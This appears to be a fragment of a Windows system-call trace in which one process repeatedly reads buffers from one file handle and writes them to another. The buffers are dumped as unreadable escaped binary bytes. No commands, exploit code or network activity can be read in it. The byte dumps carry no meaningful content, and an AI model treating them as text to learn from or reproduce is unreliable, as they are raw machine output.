\xa6i\x9a^g\xe5Loc\x82\xa6i\x9aal Se\x96eY\x96\xf0tting,[AYs\x92Te,\x9b\xe5\xb6mF\xd3p\xd4\xd5r\xd6l\x9bm\xd7\xd7\x07\xd8yJ\xd9\xdaI:\xdb\xd7u]\xd7\xdcF\xdd/\xde\x1b\xdf\x0f\xe0\x0b\xd34]]\xe1\x13\xe2L\xe3\xe4\xe5\xa8 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,135 | 1592 | NtWriteFile |
Buffer => \xbd\x05PO\xd5\x05\xb3\x16?\x80<8\\xf9\x19<;\x10g\x0e\x15]\x11x\x18\xc9r\x8c\x93h@k\xa4\xfdV}\xb6\x95*\xfb\x92\xfc\x15Pu#\x00\x91\xa7\xe05\xd90\xe0X1\xbbzu\x03#O\xeb\x11\x1f\xce\x8a\x8f\x98$k\xac\xd7\xbd\xd0\xe7f\xdbp<;\x1b\x08\xd1\x00t\xae\xcc0\xb2|\x11 \xd2\x9c\x0fZ\xbeQ6\xd9\xc5P\xbeTP\xb7\x88}\xc9+\x13\xf6\xa5\xcc j
\xbb\xc0\x84K(\x89\x0cH"A\xd8QvVB\xa9JCH'X\xe1\x17\xb1\xb5\xd4P-Yy\x19\xf8\xf8\xa0\xb1\xbc\x1cN[u\xca\x03N\x19F\x9b\xb4\x18\xaf
\xa6i\x9a^g\xe5Loc\x82\xa6i\x9aal Se\x96eY\x96\xf0tting,[AYs\x92Te,\x9b\xe5\xb6mF\xd3p\xd4\xd5r\xd6l\x9bm\xd7\xd7\x07\xd8yJ\xd9\xdaI:\xdb\xd7u]\xd7\xdcF\xdd/\xde\x1b\xdf\x0f\xe0\x0b\xd34]]\xe1\x13\xe2L\xe3\xe4\xe5\xa8 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,135 | 1592 | NtReadFile |
Buffer => \xd8\xf1\xbb\x08\x9dl\x05]\x80\xc7;\xdd\xc5\xff\x93\xc9\xa2\x1f\x08\x07w?\xff$\x95\xd9[\xe7\xef\x86M\xfa\xe8&D6h\xd8\x06/h\xc8\xe7\xe7\xe7\xe7(h\xb8!h\xa4\x1ah\x94\x13hp\x15\xb3\xe6\xe7\x0chX\x05hHWy\x97E\xbcc\x10hD\x11\x90\x03v\xa9K<\xea.\x11J6h<=\x8c}vr, +hh\x18\x07\x8dV\xf1\xac\x10\x90\x06\x81\xc3\xa6;\x98t/YS\x1c\xdbK\xd0(\x99\xe2\x05\x01a\x8e\x14o\x15\xa4]\x18\x01~$\xdd\xb7\x82\x91Z\xde;\xcat\x08$A\xa2M\xd65\xf4\x03Y\x94\x05@7\xd9\x7f\x84'\x03\x85\xd2\x89U\xfc~\x1a\x19\x1a\x17\x0f\x7f\x03\xfe\x80\xc2a\x88\x147\xad\xfc|\xe6\xc6\x84\x1eG@\xb3I\x14\xdc\xbe\x90\xa4U\xb4\x9f \xdf
\x93V\x1c\x8dp
\x1a\x84\x1d\xa1l \x8bJ\x1d\xb7zZ\xa6i\x9a\xce\x17\x03\x88\x8f\x96\x9d\xe0Md\x9a\xa4\xab\xa6Wh\x0c'4H\xd5m\xca~\x04G FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,135 | 1592 | NtWriteFile |
Buffer => \xd8\xf1\xbb\x08\x9dl\x05]\x80\xc7;\xdd\xc5\xff\x93\xc9\xa2\x1f\x08\x07w?\xff$\x95\xd9[\xe7\xef\x86M\xfa\xe8&D6h\xd8\x06/h\xc8\xe7\xe7\xe7\xe7(h\xb8!h\xa4\x1ah\x94\x13hp\x15\xb3\xe6\xe7\x0chX\x05hHWy\x97E\xbcc\x10hD\x11\x90\x03v\xa9K<\xea.\x11J6h<=\x8c}vr, +hh\x18\x07\x8dV\xf1\xac\x10\x90\x06\x81\xc3\xa6;\x98t/YS\x1c\xdbK\xd0(\x99\xe2\x05\x01a\x8e\x14o\x15\xa4]\x18\x01~$\xdd\xb7\x82\x91Z\xde;\xcat\x08$A\xa2M\xd65\xf4\x03Y\x94\x05@7\xd9\x7f\x84'\x03\x85\xd2\x89U\xfc~\x1a\x19\x1a\x17\x0f\x7f\x03\xfe\x80\xc2a\x88\x147\xad\xfc|\xe6\xc6\x84\x1eG@\xb3I\x14\xdc\xbe\x90\xa4U\xb4\x9f \xdf
\x93V\x1c\x8dp
\x1a\x84\x1d\xa1l \x8bJ\x1d\xb7zZ\xa6i\x9a\xce\x17\x03\x88\x8f\x96\x9d\xe0Md\x9a\xa4\xab\xa6Wh\x0c'4H\xd5m\xca~\x04G FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,135 | 1592 | NtReadFile |
Buffer => l\xca\x02 sPH~$\xe3A\x182\xf0\xfd\xc6f\x07^^\x13\x96&S\xa0\xc9h\xcb\x97\xf3<h\x90X\xd2\x9d\xccPh\x11GA\x1ac\xfe\xafW\xea\xd7
4F3O\xdaS\xba\xa2\x018+\xaa\xc7\x048\x88\xbe;\xba\xa63\x94\x9e\xb0\x06\xea }\xe8I\xc7'\x89\x03\xec\x81;\xaf}\x0ejC\x85\xb3\xdf\xaav\x1e\xeb\x0eP\xb0\xc3\x16\x8c\x13\x11\x07\x82\xd6\x00n\xe2%l\x80&\x00\x1eT\xb7\xff\x02\xf0f\x7f`\xde\xe8Dt9HHt-\x08\x0et\x81\xb0@\xb4\x1c\x04\xd0\xb4\x1f\xea\x02\x9f\xc1
\xcf0\xeb%'\x04Q!\xf4\xe9\x93/\xc3\x81\xc1\xa0\xeb\xef0\xad\xf9\xfdm&1\x88\x16\x80f\x01\x1f\x08\x02\xcfd\x9d\xeb\xe5\xedit\x1d\x04tt\x10wu^\xdc1"8\x02\xb7\x82\xc7\xd7\xff\xb1\x88\xaeW\xd5\xd8\x91\xcb{\xfeBR\x11\xbf2\xd9\x8b\xfd\xe9#\xc7P\x0c\x07&\xdezH\xc3m'hL\xe1V\x18_OP \xfaoS\xd1 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,135 | 1592 | NtWriteFile |
Buffer => l\xca\x02 sPH~$\xe3A\x182\xf0\xfd\xc6f\x07^^\x13\x96&S\xa0\xc9h\xcb\x97\xf3<h\x90X\xd2\x9d\xccPh\x11GA\x1ac\xfe\xafW\xea\xd7
4F3O\xdaS\xba\xa2\x018+\xaa\xc7\x048\x88\xbe;\xba\xa63\x94\x9e\xb0\x06\xea }\xe8I\xc7'\x89\x03\xec\x81;\xaf}\x0ejC\x85\xb3\xdf\xaav\x1e\xeb\x0eP\xb0\xc3\x16\x8c\x13\x11\x07\x82\xd6\x00n\xe2%l\x80&\x00\x1eT\xb7\xff\x02\xf0f\x7f`\xde\xe8Dt9HHt-\x08\x0et\x81\xb0@\xb4\x1c\x04\xd0\xb4\x1f\xea\x02\x9f\xc1
\xcf0\xeb%'\x04Q!\xf4\xe9\x93/\xc3\x81\xc1\xa0\xeb\xef0\xad\xf9\xfdm&1\x88\x16\x80f\x01\x1f\x08\x02\xcfd\x9d\xeb\xe5\xedit\x1d\x04tt\x10wu^\xdc1"8\x02\xb7\x82\xc7\xd7\xff\xb1\x88\xaeW\xd5\xd8\x91\xcb{\xfeBR\x11\xbf2\xd9\x8b\xfd\xe9#\xc7P\x0c\x07&\xdezH\xc3m'hL\xe1V\x18_OP \xfaoS\xd1 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,145 | 1592 | NtReadFile |
Buffer => TW
\xc9F\xaf\xfbAU\x14\x80\x8c"R\_pAL\xb9R\xdc_|\x05\xb9Qc\xd1\xb9\x84#V\x054Q\xe6&\xebvFh\xf8\xabWV\x18P
\x05\x1c\xe0a\xb4i3 H\xc8\xf7R\x15+\xe4\xf3\x0et\x83\x11\xf8\xc0\xc3SHE\xb9\xe1\xa2}\x9f\x1a\x01\xaf\x01~\x08E\x07\x0f\x8c
\xc2h$w\xc0\x8a\x1b\xd3@\xf8\x8f\x89\x9d\x0f\xff\xf1\xd4\xb2\xb1\xcaF\x9aF}\x06\x89\xb5Z 9x\x1b\xde \xfbs\xa1
n\xf8}D\xf8\x89\xbdD\xfaB\xec;s\xc0\x1f^Y\x0cA\x0b\x83|\x92\xdd
K\xf5M\xc3\x8d\xb5O\xf4\xa8\xc4\xb7\xab\xdd^us\x8b\xb1\xbf\x01?E\xb8\xf7\xe0\x02-m\x05\x9f#a#h\xad\x07\x0c\x13\x0c@w\xbb\xc1I\xf5\x15P\x0f\xf4"\x88\x18N?\xfcf'W\xbe
\xceX\x91-'8\x9d'\x89#\xd4\xea\xfcp\xeb\xfd\xd69]\x8e\xc4\x17l7 \x90\xe8X\xeb\x18\xa2\x12\x94\xc0&<!rA\xc3
\x19 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,145 | 1592 | NtWriteFile |
Buffer => TW
\xc9F\xaf\xfbAU\x14\x80\x8c"R\_pAL\xb9R\xdc_|\x05\xb9Qc\xd1\xb9\x84#V\x054Q\xe6&\xebvFh\xf8\xabWV\x18P
\x05\x1c\xe0a\xb4i3 H\xc8\xf7R\x15+\xe4\xf3\x0et\x83\x11\xf8\xc0\xc3SHE\xb9\xe1\xa2}\x9f\x1a\x01\xaf\x01~\x08E\x07\x0f\x8c
\xc2h$w\xc0\x8a\x1b\xd3@\xf8\x8f\x89\x9d\x0f\xff\xf1\xd4\xb2\xb1\xcaF\x9aF}\x06\x89\xb5Z 9x\x1b\xde \xfbs\xa1
n\xf8}D\xf8\x89\xbdD\xfaB\xec;s\xc0\x1f^Y\x0cA\x0b\x83|\x92\xdd
K\xf5M\xc3\x8d\xb5O\xf4\xa8\xc4\xb7\xab\xdd^us\x8b\xb1\xbf\x01?E\xb8\xf7\xe0\x02-m\x05\x9f#a#h\xad\x07\x0c\x13\x0c@w\xbb\xc1I\xf5\x15P\x0f\xf4"\x88\x18N?\xfcf'W\xbe
\xceX\x91-'8\x9d'\x89#\xd4\xea\xfcp\xeb\xfd\xd69]\x8e\xc4\x17l7 \x90\xe8X\xeb\x18\xa2\x12\x94\xc0&<!rA\xc3
\x19 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,145 | 1592 | NtReadFile |
Buffer => 4 \xb1\x91\xeeY\xe1\xb5\x00\x86\x8f\xaa"\x0b\x06\x1e[^=4\x8cj\x8b\xaae\xe3\xe3\xd0\xeb
\xd6\x1b\x9a
B\xc9ho\x99\xfb\xe7\xf8u\xec\x08\xecGQ\xe8\xdd\x06B\x11\xeb\xee;\xc2\x01\x00\x83\x07,D\x11\x0f\x01\x8f\xd3\x9b\xa1r\x90\xcf\x05\x13+\x06~\xd1\x89\xc8\x10g~F\x02I\xdeuE\xde\xa0*\x05h,*\xdf\x11\x0e\xd8\xfcj\x99|\x1fw}\x18\xda$`k\xd6>\x88\x13\x0e\x1e\xf7Y\xe0\x8c\xe8\x84\xaf\xfc\xaa\xc6\x948\x87QB\x91$\xfe\xd3\x85\x87O\xe9\xb8\xe4vP\x83\xd8*#\xdfgC\xc0\xdc\xae\xb0*h\xa8R\xa0-L\x9ac\x17\\xff\x985$\x17\xd0\x82\x06\xe9\x9f\xd6\x01\xb1\x80\xb33W\xd9\x1e\x07cH\xc9Ja\xf0\xf7A\x8c\xd8\x87\x07\x10\x10^\xd68\xf8\xb6\xc8D\xdfW\x1f\xd1&\xd8\x99\xac\x15\x92J\xfc\xb3\xe7#~\xbcHz\x82\x00\x14\xdc(\xd1d\x01{\xecr\x01\xdf\xec\xe9\xd2\xdcW\x9f8\xf0\xbc\x02\x8fz}\xe7> FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,145 | 1592 | NtWriteFile |
Buffer => 4 \xb1\x91\xeeY\xe1\xb5\x00\x86\x8f\xaa"\x0b\x06\x1e[^=4\x8cj\x8b\xaae\xe3\xe3\xd0\xeb
\xd6\x1b\x9a
B\xc9ho\x99\xfb\xe7\xf8u\xec\x08\xecGQ\xe8\xdd\x06B\x11\xeb\xee;\xc2\x01\x00\x83\x07,D\x11\x0f\x01\x8f\xd3\x9b\xa1r\x90\xcf\x05\x13+\x06~\xd1\x89\xc8\x10g~F\x02I\xdeuE\xde\xa0*\x05h,*\xdf\x11\x0e\xd8\xfcj\x99|\x1fw}\x18\xda$`k\xd6>\x88\x13\x0e\x1e\xf7Y\xe0\x8c\xe8\x84\xaf\xfc\xaa\xc6\x948\x87QB\x91$\xfe\xd3\x85\x87O\xe9\xb8\xe4vP\x83\xd8*#\xdfgC\xc0\xdc\xae\xb0*h\xa8R\xa0-L\x9ac\x17\\xff\x985$\x17\xd0\x82\x06\xe9\x9f\xd6\x01\xb1\x80\xb33W\xd9\x1e\x07cH\xc9Ja\xf0\xf7A\x8c\xd8\x87\x07\x10\x10^\xd68\xf8\xb6\xc8D\xdfW\x1f\xd1&\xd8\x99\xac\x15\x92J\xfc\xb3\xe7#~\xbcHz\x82\x00\x14\xdc(\xd1d\x01{\xecr\x01\xdf\xec\xe9\xd2\xdcW\x9f8\xf0\xbc\x02\x8fz}\xe7> FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,145 | 1592 | NtReadFile |
Buffer => t,% \x1agW\xf2y<s&$'25p\x89\x91\xfc&%\xdc%ip\xdc\x007\x1bTs\x06`5{\xf6\xd8u\x04g\xdehh;, \xd0\x19\x9b\xcc\x91\x1e.\xd76|P\x81\xfa\xc2
\x7fR&'\xe3\x9c\xf0\x84})\x0c\x83Ar*\x0b2>\xc9\xd9\x93\x1er\x17\x12\x14
\x0f\x83\xa8\x1a\xbaf(?\xc6G\xe9C\x1c\x1eB\xde\xdcY\x8a\x028h\xd8+<r\x13\xb7\xddvJseB\xd00\xebA?\x07\x03{x%7Hh\x98\xf7\xf76\x048c;\xbbl\xebAY?%\x94X\xf2R\x9c\xc0l\x903\x18\x034\x04\x02v\xa9\xdchHGWKP\x03%"\x0c;\x03\x18\x95\xbbE\xc0\xbe$%X\x110\xa4j\x19\xd5\x05\x03\xf9\xfd0+8+8\xcd%\x1c}\x80\xfc\xfe\x04\xa8\xceD`x\xb9M\x0e_\x9fT\xc2\x05\xb2\xff%\xf8{%\x00Ea\x86\x00\xb2\x00'\x8a",\x03\x88\x12\xa6i\x9a\xe6P\x00\x84\x80|xt FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,145 | 1592 | NtWriteFile |
Buffer => t,% \x1agW\xf2y<s&$'25p\x89\x91\xfc&%\xdc%ip\xdc\x007\x1bTs\x06`5{\xf6\xd8u\x04g\xdehh;, \xd0\x19\x9b\xcc\x91\x1e.\xd76|P\x81\xfa\xc2
\x7fR&'\xe3\x9c\xf0\x84})\x0c\x83Ar*\x0b2>\xc9\xd9\x93\x1er\x17\x12\x14
\x0f\x83\xa8\x1a\xbaf(?\xc6G\xe9C\x1c\x1eB\xde\xdcY\x8a\x028h\xd8+<r\x13\xb7\xddvJseB\xd00\xebA?\x07\x03{x%7Hh\x98\xf7\xf76\x048c;\xbbl\xebAY?%\x94X\xf2R\x9c\xc0l\x903\x18\x034\x04\x02v\xa9\xdchHGWKP\x03%"\x0c;\x03\x18\x95\xbbE\xc0\xbe$%X\x110\xa4j\x19\xd5\x05\x03\xf9\xfd0+8+8\xcd%\x1c}\x80\xfc\xfe\x04\xa8\xceD`x\xb9M\x0e_\x9fT\xc2\x05\xb2\xff%\xf8{%\x00Ea\x86\x00\xb2\x00'\x8a",\x03\x88\x12\xa6i\x9a\xe6P\x00\x84\x80|xt FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,155 | 1592 | NtReadFile |
Buffer => \x9f\xff\xff\xfa\xb71\xfd\xfe\xff\x87?\xdai\xbbf\xe0\xab\xc4q\xae\x95D\\xc9Ex\x91\x95\x98\xa4\x8f\xfc\xff\xff\xd8\x9a\xa7\xb9=\xe3^$\x17\xed\x85\x05ch\xb5\xd6\xbek\x02\xe6b\xd5x\xe1\xd2\xf3\xff\xff\xff\xbd\x82\x18\x1a$\xd3\x8dM\xce<\xb5\xae\xbe\x90\x1c\xc5\xc4\x0e?\xe9.\xa1\xa7m\xbfU\x02@\xff\xff\xff\xff\xe2\xe0PI\x0f\xc3?\x12\xb6t\xb3{\xfc\xfa\x93\x96k\xd0\x92\xc7\xaaFMPWDHOUEJ\xff\xff\xff\xffQ\x8fu\x9c\xbeVGKNTA@CBBEC@DP/\xc4\x9aDDGF6n@$5\xff\xff\xff\xff\x1f\x9a\xb7\xb7\xa0\x08/5,5\x06C\x02./I"O%\xbe\xac\xfe\xa0\x125 \x0c\x14\xcc-e\xcd\xff\xbf\xfd\xff\xc0\xad}Dv\x12\x17\x16+a\x18r\x81\xf7\x19\xb1\xcc\xfc\xf9\xbc{r\x9a\xb2\xea\x87\xc4t\xb7\xff\xff\xff\xbfH@Gv\xb8>\x1a9r\x0f\xc1dA\xca\x87\x12j\x86\x11\xcc\xc5 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,155 | 1592 | NtWriteFile |
Buffer => \x9f\xff\xff\xfa\xb71\xfd\xfe\xff\x87?\xdai\xbbf\xe0\xab\xc4q\xae\x95D\\xc9Ex\x91\x95\x98\xa4\x8f\xfc\xff\xff\xd8\x9a\xa7\xb9=\xe3^$\x17\xed\x85\x05ch\xb5\xd6\xbek\x02\xe6b\xd5x\xe1\xd2\xf3\xff\xff\xff\xbd\x82\x18\x1a$\xd3\x8dM\xce<\xb5\xae\xbe\x90\x1c\xc5\xc4\x0e?\xe9.\xa1\xa7m\xbfU\x02@\xff\xff\xff\xff\xe2\xe0PI\x0f\xc3?\x12\xb6t\xb3{\xfc\xfa\x93\x96k\xd0\x92\xc7\xaaFMPWDHOUEJ\xff\xff\xff\xffQ\x8fu\x9c\xbeVGKNTA@CBBEC@DP/\xc4\x9aDDGF6n@$5\xff\xff\xff\xff\x1f\x9a\xb7\xb7\xa0\x08/5,5\x06C\x02./I"O%\xbe\xac\xfe\xa0\x125 \x0c\x14\xcc-e\xcd\xff\xbf\xfd\xff\xc0\xad}Dv\x12\x17\x16+a\x18r\x81\xf7\x19\xb1\xcc\xfc\xf9\xbc{r\x9a\xb2\xea\x87\xc4t\xb7\xff\xff\xff\xbfH@Gv\xb8>\x1a9r\x0f\xc1dA\xca\x87\x12j\x86\x11\xcc\xc5 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,155 | 1592 | NtReadFile |
Buffer => \x8e<\xff\xbf\xfd/3\x10\xc2\xc1BN\xcc\xc2O\xe9f\x00\xf6\x9c,\xba<*\xca\x06{\x0c\x0f}\xdfX\xf8\xff\x89+z9\xe9\x11rrn\xd6\xd0\x81\x0c\x18\x01\xccB\xb6\x8aU\xff\xff\xff\xff7x\x16\xd5_Mxq?QQ.\xac.\x9a\xc1vM\xa8\xb6pz\x97<FW\xcf}\xd9\x02\xf2\xf4\xff\xff\xbf\xf0\xb3>\xed<\x86\x9f=\xcf\xbeG\xdb2\xf6\x96<Ew2r\xb7\x18*\x14i[+\xff\xdf\xfe\xffI\xffTW]w\xb7\x95\xb2\x02\xb5\xccUq-!V\<N\xcaP\xc2\x80E\xc8\x15\xc4\xff\xad\xff\xff\x99|\xac\xabs4~-@\x95ZRL\x18H+'oY\xa8\xdfI\xc9v\x02]\xe8\xff\xff\xff\xc2\x87Fz\xb2=g\xe0l\xf9\xf51\x9a\xb9`\x85m\x82\xb0.'\xf78S|\x18\x18\xf8\x05\xfe_\x0f\xb1\xc4~\x03\xb4e\x12\xca\x1cI\x17\xf5\xcaq\x17\xad\xcf\xdf\xf8\xff\x17E\x8c\xbe2MISY\xca\xb9\xca\xc4\xbe=\xaa\xe7_ FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,155 | 1592 | NtWriteFile |
Buffer => \x8e<\xff\xbf\xfd/3\x10\xc2\xc1BN\xcc\xc2O\xe9f\x00\xf6\x9c,\xba<*\xca\x06{\x0c\x0f}\xdfX\xf8\xff\x89+z9\xe9\x11rrn\xd6\xd0\x81\x0c\x18\x01\xccB\xb6\x8aU\xff\xff\xff\xff7x\x16\xd5_Mxq?QQ.\xac.\x9a\xc1vM\xa8\xb6pz\x97<FW\xcf}\xd9\x02\xf2\xf4\xff\xff\xbf\xf0\xb3>\xed<\x86\x9f=\xcf\xbeG\xdb2\xf6\x96<Ew2r\xb7\x18*\x14i[+\xff\xdf\xfe\xffI\xffTW]w\xb7\x95\xb2\x02\xb5\xccUq-!V\<N\xcaP\xc2\x80E\xc8\x15\xc4\xff\xad\xff\xff\x99|\xac\xabs4~-@\x95ZRL\x18H+'oY\xa8\xdfI\xc9v\x02]\xe8\xff\xff\xff\xc2\x87Fz\xb2=g\xe0l\xf9\xf51\x9a\xb9`\x85m\x82\xb0.'\xf78S|\x18\x18\xf8\x05\xfe_\x0f\xb1\xc4~\x03\xb4e\x12\xca\x1cI\x17\xf5\xcaq\x17\xad\xcf\xdf\xf8\xff\x17E\x8c\xbe2MISY\xca\xb9\xca\xc4\xbe=\xaa\xe7_ FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,155 | 1592 | NtReadFile |
Buffer => \x81\x95@\xff\x85\xff\xffM|~
\x86\xce>Q)\xd1\x1e@\xa2}/\xbd)\xda\xc4\x9c!\xabn\xaf\xc2x\xff\xd6\xff\xffm5K\xdb\xcd]\x93\xeeG+\xaf\x18I\x8dEM\x89I@tE\xbd&\xd1\xa7\xd6\xfa\xff\xff[\xb7?`\xbaT\x10s>\xdbQ\xbd\xc1\xe5D\xbc/\x07_\xdbl\x04\x01y\xed\xdf\xf8\xb7\xae\x97\x96p\xd1\x80L)n\xc9\x93\xc2/7W"\xce\xff\xff/\xf4\xce)S]7I\xf4Iqc\xba\xd8\xc5\xecq\xf7iTQ\xc0\x83\xb1cS\xff\xff\xff\xff\,\xf7\x13\x17\x04\xde\x95\x17s\x84\xa9\xd9(\xc2\x90\x01@\x18\xaff|\xfb\x1c\x81\xbf\x15\x9e\x12\x87\x04\x85\xff\xff\xff\xffB\x1co\xd6\x8a\x84.\x87'\x865\x896\x88 \x8a\xa43\xf8V\x8b3\x8a$\x8d\x1d\x8c\x0c\x8f,\x96m\xff\xff\xff\xff\xd6(\x8e"\x91\x90n\x932v\x8a\xef(\xdb\x92\x95\x94\x97f\x96\x16\x99\x1c\xf2\x9dw\x98/^\x9b%\x9a\xc0\x0b\xff\xff\x9d\x0e\x9c\x8c3 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,155 | 1592 | NtWriteFile |
Buffer => \x81\x95@\xff\x85\xff\xffM|~
\x86\xce>Q)\xd1\x1e@\xa2}/\xbd)\xda\xc4\x9c!\xabn\xaf\xc2x\xff\xd6\xff\xffm5K\xdb\xcd]\x93\xeeG+\xaf\x18I\x8dEM\x89I@tE\xbd&\xd1\xa7\xd6\xfa\xff\xff[\xb7?`\xbaT\x10s>\xdbQ\xbd\xc1\xe5D\xbc/\x07_\xdbl\x04\x01y\xed\xdf\xf8\xb7\xae\x97\x96p\xd1\x80L)n\xc9\x93\xc2/7W"\xce\xff\xff/\xf4\xce)S]7I\xf4Iqc\xba\xd8\xc5\xecq\xf7iTQ\xc0\x83\xb1cS\xff\xff\xff\xff\,\xf7\x13\x17\x04\xde\x95\x17s\x84\xa9\xd9(\xc2\x90\x01@\x18\xaff|\xfb\x1c\x81\xbf\x15\x9e\x12\x87\x04\x85\xff\xff\xff\xffB\x1co\xd6\x8a\x84.\x87'\x865\x896\x88 \x8a\xa43\xf8V\x8b3\x8a$\x8d\x1d\x8c\x0c\x8f,\x96m\xff\xff\xff\xff\xd6(\x8e"\x91\x90n\x932v\x8a\xef(\xdb\x92\x95\x94\x97f\x96\x16\x99\x1c\xf2\x9dw\x98/^\x9b%\x9a\xc0\x0b\xff\xff\x9d\x0e\x9c\x8c3 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,165 | 1592 | NtReadFile |
Buffer => \xeek\xee\xf6S\x06\xf3\xc8\x1f\xf4\x0e\xaax\xfe\xe6\x06\x87N\xb7\xff\xff\xff\xffz\x8e?G
\x9e\x80\xa2B\x12\x9a\x91\xd9*\xbe\x03\x8e\xc8\x17E5\xf3\xca\x8a\x01t\x012\xa0\x81\xf4\x18\xdf\xda\xea\xff\x83&\xe4\x89*\x95\x84,Pa?<\xca\x0c\xc0Z\xfb\x15\xff\xff\xff\xffzJ\x015z\x83=\x08\xd9\x11\xd19\x89\xbe\x1f\xe8\xf9S\x9c6\xda\x11U\x18\x84z\xca\x86\xb6\x91\x87r\xff\xff7\xf8\xe6\xff\xec\xb5x\xc7<gSvQf=\xca^,y\xe2pG(}\x80&\xfc[|\xab*\x0cO\x17\x8bG\xefR\x18F\xf2\xd8\x17\x14\xff\xff\xff/\x94\x06\xb6z\x16\xe7sF \x16\x08z\x805Pr\xe2\xf4,JJ\x8b\x02\x836x-\xbc\x89\xff\xbf\xf1\x17\x1f+\x83\x1fE\xcc\xf3\xea\xea\xbeO\x1e\x0ba
\xac \x06\xc7\xff\x7f\xab\x7f\xba\xe1\xfa\x91Cy\xbf\xb9\xf8f\xea\xd7\xfc\xc7*P;9u;\x109\xa1\xff\xff\xff\xadi\x10\xf5UF\x18\x0b\xb5\x08\xac FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,165 | 1592 | NtWriteFile |
Buffer => \xeek\xee\xf6S\x06\xf3\xc8\x1f\xf4\x0e\xaax\xfe\xe6\x06\x87N\xb7\xff\xff\xff\xffz\x8e?G
\x9e\x80\xa2B\x12\x9a\x91\xd9*\xbe\x03\x8e\xc8\x17E5\xf3\xca\x8a\x01t\x012\xa0\x81\xf4\x18\xdf\xda\xea\xff\x83&\xe4\x89*\x95\x84,Pa?<\xca\x0c\xc0Z\xfb\x15\xff\xff\xff\xffzJ\x015z\x83=\x08\xd9\x11\xd19\x89\xbe\x1f\xe8\xf9S\x9c6\xda\x11U\x18\x84z\xca\x86\xb6\x91\x87r\xff\xff7\xf8\xe6\xff\xec\xb5x\xc7<gSvQf=\xca^,y\xe2pG(}\x80&\xfc[|\xab*\x0cO\x17\x8bG\xefR\x18F\xf2\xd8\x17\x14\xff\xff\xff/\x94\x06\xb6z\x16\xe7sF \x16\x08z\x805Pr\xe2\xf4,JJ\x8b\x02\x836x-\xbc\x89\xff\xbf\xf1\x17\x1f+\x83\x1fE\xcc\xf3\xea\xea\xbeO\x1e\x0ba
\xac \x06\xc7\xff\x7f\xab\x7f\xba\xe1\xfa\x91Cy\xbf\xb9\xf8f\xea\xd7\xfc\xc7*P;9u;\x109\xa1\xff\xff\xff\xadi\x10\xf5UF\x18\x0b\xb5\x08\xac FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,165 | 1592 | NtReadFile |
Buffer => y)\x86/KFZj\x8b\xc9\x14\xff\xb7\xff\xff\xe2\x14KY\x0e\xcc\x8f"\xafq\x87\x13\x81X\xd0e\x1f\xbc\x04\xcd1M\xe6\x0b'-\xae\x88_\xe0\xff\xff\x9fWR\x0e4\x8bOB\xa9$\xdd;\x07\xf0\x18)\x94\xcc\x11\x14cJ\xf1\xf4\xfe/\xf4\xffA\x13\xec\xf4cM\xf9\x848\xf2\xabv\xdbr\x81yB5`\x01\xc1}B\xbf\xfd\xff\xb7C\xb8WB\x82\xcb \xbe1\xe8\xde;\xedM\xf7F\x87\x8a!@\xa3\xe8W_\xe0\xdb\xff\x1cM\xa9\xd0\x0b\x12\x13"\xf7\x14\x8eD\xe2\xbda8\xac\x80\xbd\xae\xdf\xe8/\xf4\x80U?\x0bY\xb9
\xf4\xbeS\xc3{D\xa9}\xaf/\xf5\xff[\xffs=K\xbe\x9c\xfez\xa3\x80q\xaa[\xcb_[R\xc1\xff\xbf\xd4\xff\xa0\xe9\x1e\xb7\x98\xd8Z\x88Z6K\xb6\xbe\xb8aX\x00B\x8bu\xc9O\x07\xc9\xff\xff\xbf\xc4\xa1b\x1d\x85N\xbe\xbbM4\xf8\xbd\x17\xd0\xd9\xb1-%\x19\x82\xf2\x11\xc2\xfe\x05\xff\xff/\xf5\x9aUABz FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,165 | 1592 | NtWriteFile |
Buffer => y)\x86/KFZj\x8b\xc9\x14\xff\xb7\xff\xff\xe2\x14KY\x0e\xcc\x8f"\xafq\x87\x13\x81X\xd0e\x1f\xbc\x04\xcd1M\xe6\x0b'-\xae\x88_\xe0\xff\xff\x9fWR\x0e4\x8bOB\xa9$\xdd;\x07\xf0\x18)\x94\xcc\x11\x14cJ\xf1\xf4\xfe/\xf4\xffA\x13\xec\xf4cM\xf9\x848\xf2\xabv\xdbr\x81yB5`\x01\xc1}B\xbf\xfd\xff\xb7C\xb8WB\x82\xcb \xbe1\xe8\xde;\xedM\xf7F\x87\x8a!@\xa3\xe8W_\xe0\xdb\xff\x1cM\xa9\xd0\x0b\x12\x13"\xf7\x14\x8eD\xe2\xbda8\xac\x80\xbd\xae\xdf\xe8/\xf4\x80U?\x0bY\xb9
\xf4\xbeS\xc3{D\xa9}\xaf/\xf5\xff[\xffs=K\xbe\x9c\xfez\xa3\x80q\xaa[\xcb_[R\xc1\xff\xbf\xd4\xff\xa0\xe9\x1e\xb7\x98\xd8Z\x88Z6K\xb6\xbe\xb8aX\x00B\x8bu\xc9O\x07\xc9\xff\xff\xbf\xc4\xa1b\x1d\x85N\xbe\xbbM4\xf8\xbd\x17\xd0\xd9\xb1-%\x19\x82\xf2\x11\xc2\xfe\x05\xff\xff/\xf5\x9aUABz FileHandle => 0x000001bc |
